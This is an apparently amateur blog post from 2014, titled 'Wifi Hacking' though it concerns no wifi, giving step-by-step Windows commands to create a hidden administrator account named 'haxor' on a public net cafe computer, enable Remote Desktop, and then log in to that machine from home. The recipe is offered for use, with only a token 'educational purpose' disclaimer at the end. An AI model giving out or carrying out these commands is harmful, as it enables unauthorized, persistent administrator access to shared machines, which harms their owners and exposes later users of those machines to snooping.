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Sunday, 13 April 2014

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Wifi Hacking


Have you ever tried to use your neighbours wifi???this is using a computer in netcafe to download films remotely using your computer from home seems interesting rite...lets get into the topic :) :) 

go to netcafe choose a computer  u prefer then start ur work :) 

1.Start-run-cmd-run as administrator

2.you need to add an user to the pc in netcafe u can do it using the command 

1. net user haxor p4s$word /add

2. then type net user

you can see user gets added to it :) :)

3.then type this :)

2. net localgroup administrators haxor /add

4.then you type

3. net user haxor /active:yes

5.now you have successfully done with your cmd thing..lets do this

Here you have to allow remote desktop connection :) :)

Then type ip config in cmd and note his ip address --this is what we need to connect to it from our remote pc :) :)

Here you have to be sure that 3389 port is enabled or not in the netcafe computer if that is disabled rdp wont work :)
you can check dat in www.yougetsignal.com/tools/open-ports/   by giving netcafe ip n port number as 3389

now come bak 2 home open up your pc start-remote destop connection give that ip and connect.

connect and you get connected remotely  happy hacking :) :)

Note---This tutorial is mainly for educational purpose dont misuse it :) :) 


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